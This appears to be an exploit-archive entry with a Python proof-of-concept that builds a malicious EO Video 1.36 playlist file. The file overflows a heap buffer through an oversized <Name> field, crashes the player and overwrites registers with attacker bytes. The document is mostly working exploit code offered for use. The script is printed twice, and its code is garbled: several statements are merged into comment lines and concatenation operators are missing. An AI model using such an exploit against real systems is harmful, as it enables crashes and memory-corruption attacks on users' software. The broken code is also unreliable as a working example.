EO Video 1.36 Local Heap Overflow DOS / PoC
#!/usr/bin/python
# --------------------------------------------------------------
# EO Video v1.36 Heap Overflow local PoC/DoS exploit
# *.eop playlist file in <Name> buffer overflow
# Other versions may be vulnerable too...
# --------------------------------------------------------------
# Vulnerability discovered and coded by Muris Kurgas aka j0rgan
# jorganwd [at] gmail [dot] com
# --------------------------------------------------------------
#
# Who uses this crap of player anyway? :)
# --------------------------------------------------------------
# EAX 42424242
# EDX 42424242
# -------------------------------------------------------------- import os bafer = '\x41'* 700 '\x42' * 4 print "Spit me out, all bright and shiny! :)"
fileHandle = open ( 'plejlista.eop', 'w' )
fileHandle.write ('<EOPlaylist>\n<Playlist>\n<FolderList>\n<Folder>\n<Name>nesto</Name>\n<TrueFrequency>1</TrueFrequency>\n ')
fileHandle.write ('</Folder>\n<Folder>\n<Name>nesto</Name>\n<TrueFrequency>1</TrueFrequency>\n</Folder>\n</FolderList>\n<ProjectElement>\n ')
fileHandle.write ('<Name>' bafer '</Name>')
fileHandle.write ('<StartTime>0</StartTime>\n<EndTime>0</EndTime>\n<MediaSize>\n<Width>-1</Width>\n<Height>-1</Height>\n</MediaSize>\n ')
fileHandle.write ('<State>30216</State>\n<FolderPositionIndex>0</FolderPositionIndex>\n ')
fileHandle.write ('</ProjectElement>\n</Playlist>\n</EOPlaylist>\n')
fileHandle.close ()
# --------------------------------------------------------------
# EO Video v1.36 Heap Overflow local PoC/DoS exploit
# *.eop playlist file in <Name> buffer overflow
# Other versions may be vulnerable too...
# --------------------------------------------------------------
# Vulnerability discovered and coded by Muris Kurgas aka j0rgan
# jorganwd [at] gmail [dot] com
# --------------------------------------------------------------
#
# Who uses this crap of player anyway? :)
# --------------------------------------------------------------
# EAX 42424242
# EDX 42424242
# -------------------------------------------------------------- import os bafer = '\x41'* 700 '\x42' * 4 print "Spit me out, all bright and shiny! :)"
fileHandle = open ( 'plejlista.eop', 'w' )
fileHandle.write ('<EOPlaylist>\n<Playlist>\n<FolderList>\n<Folder>\n<Name>nesto</Name>\n<TrueFrequency>1</TrueFrequency>\n ')
fileHandle.write ('</Folder>\n<Folder>\n<Name>nesto</Name>\n<TrueFrequency>1</TrueFrequency>\n</Folder>\n</FolderList>\n<ProjectElement>\n ')
fileHandle.write ('<Name>' bafer '</Name>')
fileHandle.write ('<StartTime>0</StartTime>\n<EndTime>0</EndTime>\n<MediaSize>\n<Width>-1</Width>\n<Height>-1</Height>\n</MediaSize>\n ')
fileHandle.write ('<State>30216</State>\n<FolderPositionIndex>0</FolderPositionIndex>\n ')
fileHandle.write ('</ProjectElement>\n</Playlist>\n</EOPlaylist>\n')
fileHandle.close ()
